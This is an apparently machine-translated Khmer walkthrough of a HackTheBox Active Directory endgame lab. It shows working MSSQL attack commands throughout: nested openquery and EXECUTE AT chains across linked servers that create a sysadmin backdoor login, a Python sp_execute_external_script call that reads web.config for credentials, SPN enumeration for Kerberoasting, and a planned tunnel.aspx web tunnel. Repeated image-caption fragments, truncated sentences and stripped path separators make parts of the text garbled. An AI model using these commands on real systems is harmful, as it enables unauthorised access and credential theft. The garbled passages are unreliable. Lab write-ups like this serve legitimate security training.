αžŠαžΌαž…αŸ’αž“αŸαŸ‡β€‹αž‚αŸ’αž˜αžΆαž“β€‹αžŸαž·αž‘αŸ’αž’αž·β€‹αž’αŸ’αžœαžΈβ€‹αž‘αŸαŸ” αžαŸ„αŸ‡αž˜αžΎαž›αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžŠαŸ‚αž›αž”αžΆαž“αž—αŸ’αž‡αžΆαž”αŸ‹αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αžŸαžšαžŸαŸαžšαž’αŸ†αž–αžΈαž”αž…αŸ’αž…αŸαž€αž‘αŸαžŸαž“αŸαŸ‡αž™αŸ‰αžΆαž„αž›αŸ†αž’αž·αž αž“αŸ…αž‘αžΈαž“αŸαŸ‡.

SELECT * FROM master..sysservers;

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž™αžΎαž„αžšαž€αžƒαžΎαž‰ SQL Server αž•αŸ’αžŸαŸαž„αž‘αŸ€αžαŸ” αž…αžΌαžšαž™αžΎαž„αž–αž·αž“αž·αžαŸ’αž™αž˜αžΎαž›αž€αžΆαžšαž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž“αŸƒαž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαž“αŸ…αž›αžΎαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž“αŸαŸ‡αžŠαŸ„αž™αž”αŸ’αžšαžΎ openquery() αŸ”

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™β€‹αž™αžΎαž„β€‹αžαŸ‚αž˜αž‘αžΆαŸ†αž„β€‹αž’αžΆαž…β€‹αž”αž„αŸ’αž€αžΎαžβ€‹αž˜αŸ‚αž€αž’αžΆαž„β€‹αžŸαŸ†αžŽαž½αžšαŸ”

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

αž€αžΆαžšαž–αž·αžαž‚αžΊαžαžΆαž“αŸ…αž–αŸαž›αžŠαŸ‚αž›αž™αžΎαž„αž’αŸ’αžœαžΎαž€αžΆαžšαžŸαŸ’αž“αžΎαžŸαž»αŸ†αž‘αŸ…αž€αžΆαž“αŸ‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžŠαŸ‚αž›αž”αžΆαž“αž—αŸ’αž‡αžΆαž”αŸ‹ αžŸαŸ†αžŽαžΎαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αŸ’αž“αž»αž„αž”αžšαž·αž”αž‘αž“αŸƒαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž•αŸ’αžŸαŸαž„αž‘αŸ€αž! αžαŸ„αŸ‡αž˜αžΎαž›αž”αžšαž·αž”αž‘αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŽαžΆαžŠαŸ‚αž›αž™αžΎαž„αž€αŸ†αž–αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸ…αž›αžΎαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžŠαŸ‚αž›αž”αžΆαž“αž—αŸ’αž‡αžΆαž”αŸ‹αŸ”

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αž₯αž‘αžΌαžœαž“αŸαŸ‡αžŸαžΌαž˜αž˜αžΎαž›αž“αŸ…αž€αŸ’αž“αž»αž„αž”αžšαž·αž”αž‘αž’αŸ’αžœαžΈαžŠαŸ‚αž›αžŸαŸ†αžŽαžΎαž–αžΈαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžŠαŸ‚αž›αž”αžΆαž“αž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ…αžšαž”αžŸαŸ‹αž™αžΎαž„αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αŸ’αž“αŸαŸ‡ αžœαžΆαž‚αžΊαž‡αžΆαž”αžšαž·αž”αž‘ DBO αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαžαŸ‚αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αŸ” αžŸαžΌαž˜αž–αž·αž“αž·αžαŸ’αž™αž˜αžΎαž›αžŸαž·αž‘αŸ’αž’αž·αž€αŸ’αž“αž»αž„αž€αžšαžŽαžΈαž˜αžΆαž“αžŸαŸ†αžŽαžΎαž–αžΈαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžŠαŸ‚αž›αž”αžΆαž“αž—αŸ’αž‡αžΆαž”αŸ‹αŸ”

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αžŠαžΌαž…αžŠαŸ‚αž›αž’αŸ’αž“αž€αž’αžΆαž…αžƒαžΎαž‰αž™αžΎαž„αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž‘αžΆαŸ†αž„αž’αžŸαŸ‹! αžαŸ„αŸ‡αž”αž„αŸ’αž€αžΎαž admin αžšαž”αžŸαŸ‹αž™αžΎαž„αž”αŸ‚αž”αž“αŸαŸ‡αŸ” αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž–αž½αž€αž‚αŸαž˜αž·αž“αž’αž“αž»αž‰αŸ’αž‰αžΆαžαž±αŸ’αž™αž–αž½αž€αž‚αŸαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αžŸαŸ†αžŽαž½αžšαž”αžΎαž€αž…αŸ†αž αž‘αŸ αž…αžΌαžšαž’αŸ’αžœαžΎαžœαžΆαžαžΆαž˜αžšαž™αŸˆ EXECUTE AT αŸ”

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

αž αžΎαž™αž₯αž‘αžΌαžœαž“αŸαŸ‡αž™αžΎαž„αž—αŸ’αž‡αžΆαž”αŸ‹αž‡αžΆαž˜αž½αž™αž–αŸαžαŸŒαž˜αžΆαž“αžŸαž˜αŸ’αž„αžΆαžαŸ‹αžšαž”αžŸαŸ‹αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαžαŸ’αž˜αžΈ αžŸαž„αŸ’αž€αŸαžαž˜αžΎαž›αž˜αžΌαž›αžŠαŸ’αž‹αžΆαž“αž‘αž·αž“αŸ’αž“αž“αŸαž™αž‘αž„αŸ‹αžαŸ’αž˜αžΈαŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„αž”αŸ’αžšαž‚αž›αŸ‹αž‘αž„αŸ‹αž‡αžΆαžαž·αž“αŸαŸ‡ αž αžΎαž™αž”αž“αŸ’αžαž‘αŸ…αž˜αž»αžαž‘αŸ€αžαŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž‘αž„αŸ‹αž‡αžΆαžαž·αžαžΆαž„αž€αŸ’αžšαŸ„αž™

αžαŸ„αŸ‡αž™αž€αžŸαŸ‚αž›αžŠαŸ„αž™αž”αŸ’αžšαžΎ MSSQL αžαŸ’αž‰αž»αŸ†αž€αŸ†αž–αž»αž„αž”αŸ’αžšαžΎ mssqlclient αž–αžΈαž€αž‰αŸ’αž…αž”αŸ‹ impacket αŸ”

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž™αžΎαž„αžαŸ’αžšαžΌαžœαž‘αž‘αž½αž›αž”αžΆαž“αž–αžΆαž€αŸ’αž™αžŸαž˜αŸ’αž„αžΆαžαŸ‹ αž αžΎαž™αžšαžΏαž„αžŠαŸ†αž”αžΌαž„αžŠαŸ‚αž›αž™αžΎαž„αž”αžΆαž“αž‡αž½αž”αžšαž½αž…αž αžΎαž™αž‚αžΊαž‚αŸαž αž‘αŸ†αž–αŸαžšαŸ” αžŠαžΌαž…αŸ’αž“αŸαŸ‡ αž™αžΎαž„β€‹αžαŸ’αžšαžΌαžœβ€‹αž€αžΆαžšβ€‹αž€αžΆαžšβ€‹αž€αŸ†αžŽαžαŸ‹β€‹αžšαž…αž“αžΆαžŸαž˜αŸ’αž–αŸαž“αŸ’αž’β€‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“β€‹αž”αž˜αŸ’αžšαžΎβ€‹αž”αžŽαŸ’αžŠαžΆαž‰ (αž™αžΎαž„β€‹αž˜αž·αž“β€‹αž’αžΆαž…β€‹αž”αŸ„αŸ‡β€‹αžŸαŸ‚αž›β€‹αžŠαŸ‚αž›β€‹αž„αžΆαž™β€‹αžŸαŸ’αžšαž½αž›β€‹αž“αŸ„αŸ‡β€‹αž‘αŸ αž‡αžΆαž€αŸ‹αžŸαŸ’αžαŸ‚αž„β€‹αž‡αž‰αŸ’αž‡αžΆαŸ†αž„β€‹αž—αŸ’αž›αžΎαž„β€‹αž€αŸ†αž–αž»αž„β€‹αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš)αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αžŠαž·αžŸαŸαž’αŸ” αž‘αŸ„αŸ‡αž”αžΈαž‡αžΆαž™αžΎαž„αž’αžΆαž…αž’αžΆαž“αž―αž€αžŸαžΆαžšαž–αžΈ MSSQL αž€αŸαžŠαŸ„αž™ αž™αžΎαž„αž‚αŸ’αžšαžΆαž“αŸ‹αžαŸ‚αžαŸ’αžšαžΌαžœαžŠαžΉαž„αž–αžΈαž’αŸ’αžœαžΈαžŠαŸ‚αž›αž—αžΆαžŸαžΆαžŸαžšαžŸαŸαžšαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαžαŸ’αžšαžΌαžœαž”αžΆαž“αž€αŸ†αžŽαžαŸ‹αžšαž…αž“αžΆαžŸαž˜αŸ’αž–αŸαž“αŸ’αž’αŸ” αž αžΎαž™αž“αŸ…αž€αŸ’αž“αž»αž„αžαž MSSQL αž™αžΎαž„αžšαž€αžƒαžΎαž‰αžαžΆαž˜αžΆαž“ Python αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž˜αž·αž“αž˜αžΆαž“αž”αž‰αŸ’αž αžΆαž€αŸ’αž“αž»αž„αž€αžΆαžšαž’αžΆαž“αž―αž€αžŸαžΆαžš web.config αž‘αŸαŸ”

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž›αž·αžαž·αžαžŸαž˜αŸ’αž‚αžΆαž›αŸ‹αžŠαŸ‚αž›αž”αžΆαž“αžšαž€αžƒαžΎαž‰ αžŸαžΌαž˜αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹ /admin αž αžΎαž™αž™αž€αž‘αž„αŸ‹αž‡αžΆαžαž·αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž‘αž„αŸ‹αž‡αžΎαž„

αžαžΆαž˜αž–αž·αž αž˜αžΆαž“αž€αžΆαžšαžšαž’αžΆαž€αŸ‹αžšαž’αž½αž›αžαŸ’αž›αŸ‡αŸ—αž–αžΈαž€αžΆαžšαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž‡αž‰αŸ’αž‡αžΆαŸ†αž„αž—αŸ’αž›αžΎαž„ αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž˜αžΎαž›αžαžΆαž˜αžšαž™αŸˆαž€αžΆαžšαž€αŸ†αžŽαžαŸ‹αž”αžŽαŸ’αžαžΆαž‰ αž™αžΎαž„αžŸαž„αŸ’αž€αŸαžαžƒαžΎαž‰αžαžΆ αž–αž·αž’αžΈαž€αžΆαžš IPv6 αž€αŸαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž•αž„αžŠαŸ‚αžš!

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž”αž“αŸ’αžαŸ‚αž˜αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αž“αŸαŸ‡αž‘αŸ… /etc/hosts.
dead:babe::1001 poo6.htb
αžαŸ„αŸ‡αžŸαŸ’αž€αŸαž“αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸ’αžαž„αž‘αŸ€αž αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž›αžΎαž€αž“αŸαŸ‡αž›αžΎαžŸ IPv6αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž αžΎαž™αžŸαŸαžœαžΆαž€αž˜αŸ’αž˜ WinRM αž˜αžΆαž“αž“αŸ…αž›αžΎ IPv6 αŸ” αž…αžΌαžšαž—αŸ’αž‡αžΆαž”αŸ‹αž‡αžΆαž˜αž½αž™αž›αž·αžαž·αžαžŸαž˜αŸ’αž‚αžΆαž›αŸ‹αžŠαŸ‚αž›αž”αžΆαž“αžšαž€αžƒαžΎαž‰αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž˜αžΆαž“αž‘αž„αŸ‹αž˜αž½αž™αž“αŸ…αž›αžΎαž•αŸ’αž‘αŸƒαžαž» αžŸαžΌαž˜αž”αŸ’αžšαž‚αž›αŸ‹αžœαžΆαŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž‘αž„αŸ‹αž‡αžΆαžαž· P00ned

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž–αžΈαž€αžΆαžšαžˆαŸ’αž›αž”αž™αž€αž€αžΆαžšαžŽαŸαž›αžΎαž˜αŸ’αž…αžΆαžŸαŸ‹αž•αŸ’αž‘αŸ‡αž‡αžΆαž˜αž½αž™ αžœαžΈαž“αž—αžΈαžŸ αž™αžΎαž„αž˜αž·αž“αž”αžΆαž“αžšαž€αžƒαžΎαž‰αž’αŸ’αžœαžΈαž–αž·αžŸαŸαžŸαž‘αŸαŸ” αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αžœαžΆαžαŸ’αžšαžΌαžœαž”αžΆαž“αž‚αŸαžŸαž˜αŸ’αžšαŸαž…αž…αž·αžαŸ’αžαžšαž€αž˜αžΎαž›αž›αž·αžαž·αžαžŸαž˜αŸ’αž‚αžΆαž›αŸ‹αž˜αŸ’αžαž„αž‘αŸ€αž (αžαŸ’αž‰αž»αŸ†αž€αŸαž”αžΆαž“αžŸαžšαžŸαŸαžšαž›αžΎαž”αŸ’αžšαž’αžΆαž“αž”αž‘αž“αŸαŸ‡αž•αž„αžŠαŸ‚αžšαŸ” αž’αžαŸ’αžαž”αž‘) αž”αŸ‰αž»αž“αŸ’αžαŸ‚αžαŸ’αž‰αž»αŸ†αž˜αž·αž“αž’αžΆαž…αž‘αž‘αž½αž›αž”αžΆαž“ SPNs αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž–αžΈαž”αŸ’αžšαž–αŸαž“αŸ’αž’αžαžΆαž˜αžšαž™αŸˆ WinRM αž‘αŸαŸ”

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž…αžΌαžšαž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžαžΆαž˜αžšαž™αŸˆ MSSQL αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

αž“αŸ…αž€αŸ’αž“αž»αž„αžœαž·αž’αžΈαž“αŸαŸ‡ αž™αžΎαž„αž‘αž‘αž½αž›αž”αžΆαž“ SPN αž“αŸƒαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ p00_hr αž“αž·αž„ p00_adm αžŠαŸ‚αž›αž˜αžΆαž“αž“αŸαž™αžαžΆαž–αž½αž€αž‚αŸαž„αžΆαž™αžšαž„αž‚αŸ’αžšαŸ„αŸ‡αž“αžΉαž„αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαžŠαžΌαž…αž‡αžΆ Kerberoasting αž‡αžΆαžŠαžΎαž˜αŸ” αžŸαžšαž»αž”αž˜αž€ αž™αžΎαž„αž’αžΆαž…αž‘αž‘αž½αž›αž”αžΆαž“αž›αŸαžαžŸαž˜αŸ’αž„αžΆαžαŸ‹αžšαž”αžŸαŸ‹αž–αž½αž€αžœαžΆαŸ”

αžŠαŸ†αž”αžΌαž„αž’αŸ’αž“αž€αžαŸ’αžšαžΌαžœαž‘αž‘αž½αž›αž”αžΆαž“αžŸαŸ‚αž›αžŠαŸ‚αž›αž˜αžΆαž“αžŸαŸ’αžαŸαžšαž—αžΆαž–αž€αŸ’αž“αž»αž„αž“αžΆαž˜αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ MSSQL αŸ” αž”αŸ‰αž»αž“αŸ’αžαŸ‚αžŠαŸ„αž™αžŸαžΆαžšαž™αžΎαž„αž˜αžΆαž“αž€αž˜αŸ’αžšαž·αžαž€αŸ’αž“αž»αž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎ αž™αžΎαž„αž˜αžΆαž“αž€αžΆαžšαžαž—αŸ’αž‡αžΆαž”αŸ‹αž‡αžΆαž˜αž½αž™αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžαžΆαž˜αžšαž™αŸˆαž…αŸ’αžšαž€ 80 αž“αž·αž„ 1433 αž”αŸ‰αž»αžŽαŸ’αžŽαŸ„αŸ‡αŸ” αž”αŸ‰αž»αž“αŸ’αžαŸ‚β€‹αž’αžΆαž…β€‹αž’αŸ’αžœαžΎβ€‹αž…αžšαžΆαž…αžšαžŽαŸβ€‹αž•αŸ’αž›αžΌαžœβ€‹αžšαžΌαž„β€‹αž€αŸ’αžšαŸ„αž˜β€‹αžŠαžΈβ€‹αžαžΆαž˜β€‹αž…αŸ’αžšαž€ ៨០! αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αžšαžΏαž„αž“αŸαŸ‡αž™αžΎαž„αž”αŸ’αžšαžΎ αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž”αž“αŸ’αž‘αžΆαž”αŸ‹. αžαŸ„αŸ‡αž•αŸ’αž‘αž»αž€αž―αž€αžŸαžΆαžš tunnel.aspx αž‘αŸ…αž€αžΆαž“αŸ‹αžαžαž•αŸ’αž‘αŸ‡αžšαž”αžŸαŸ‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž”αžŽαŸ’αžαžΆαž‰ - C: inetpubwwwroot αŸ”

HackTheBoxendgame αŸ” αž€αžΆαžšαž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž˜αž“αŸ’αž‘αžΈαžšαž–αž·αžŸαŸ„αž’αž“αŸ αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΆαž™αž›αž»αž€αž”αŸ’αžšαž€αž”αžŠαŸ„αž™αžœαž·αž‡αŸ’αž‡αžΆαž‡αžΈαžœαŸˆαŸ” Pentest Active Directory

